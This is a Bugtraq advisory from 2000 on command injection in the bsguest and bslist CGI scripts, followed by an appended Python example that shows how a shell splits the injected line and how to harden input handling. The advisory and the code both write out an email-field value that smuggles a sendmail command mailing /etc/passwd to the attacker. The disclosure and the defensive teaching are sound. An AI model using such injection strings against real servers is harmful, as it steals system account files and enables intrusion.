Bugtraq mailing list archives
BS Scripts Vulnerabilities
From: rivendell_team () YAHOO COM
Date: Thu, 21 Dec 2000 07:19:31 -0000
++++++++++++++++++++++++++++++++++++
BS Scripts Multiple CGI Vulnerabilities
Discovered by Elf (whitehatjoe () hotmail com)
Greetz: 0x7f, CompSci, Dugnet
++++++++++++++++++++++++++++++++++++

Info

There are a couple of scripts from bsScripts (www.stanback.net) that have holes in them because the author did not filter out ; from the form input. The scripts that this affects are bsguest (a guestbook script) and bslist (a mailing list script). The hole allows anyone to execute commands on the server. The author has been informed and the holes are now patched in the latest release.

-bsguest.cgi-

BSGuest does not filter out ; resulting in the ability for anyone to execute commands on the server. The attacker just enters his email address as 'hacker () example com;/usr/sbin/sendmail hacker () example com < /etc/passwd', and then the server mails a confirmation letter along with the passwd file to the attacker.

-bslist.cgi-

BSList also doesn't filter out the ; and once again anybody can execute commands on the server. This can be exploited by signing up for the mailing list with the email address of 'hacker () example com;/usr/sbin/sendmail hacker () example com < /etc/passwd'

+++++++++++++++++++++++++++++
"It's funny how impossible dreams manifest" - Cypress Hill
EOF
+++++++++++++++++++++++++++++
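
The flaw class described in the advisory above, as an added example that is not part of the original post and is not the bsScripts code: it assumes the pre-patch scripts interpolated the submitted address into a shell command line for the mailer, shows how a shell splits that line at the ;, and contrasts it with an allowlist check plus an argv list that never reaches a shell. The function names, the address pattern and the 254-character limit are assumptions made for illustration.

```python
import re
import shlex

SENDMAIL = "/usr/sbin/sendmail"  # mailer path as written in the advisory

# Constructed input: the advisory's address with the archive's "()" restored to "@".
HOSTILE = "hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd"

# Conservative allowlist (assumption, stricter than RFC 5322): no whitespace,
# no shell metacharacters, and no leading "-" that could read as an option.
ADDR_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def vulnerable_command(addr):
    """Assumed pre-patch pattern: form input interpolated into a shell string."""
    return f"{SENDMAIL} {addr}"


def shell_commands(command_line):
    """Split a command line into the separate commands a POSIX shell would
    run, using shlex only; nothing is executed."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token in (";", "&", "&&", "|", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def build_mail_argv(addr):
    """Hardened form: validate, then return an argv list for use without a
    shell (e.g. subprocess.run(argv, input=body)), so ";" is never parsed."""
    if len(addr) > 254 or not ADDR_RE.fullmatch(addr):
        raise ValueError(f"rejected address: {addr!r}")
    return [SENDMAIL, "--", addr]


if __name__ == "__main__":
    for cmd in shell_commands(vulnerable_command(HOSTILE)):
        print("shell would run:", cmd)
    print("argv form:", build_mail_argv("user@example.com"))
```

Filtering ; alone, as the advisory's wording suggests, still leaves other shell metacharacters; the allowlist and the shell-free argv list cover the whole class.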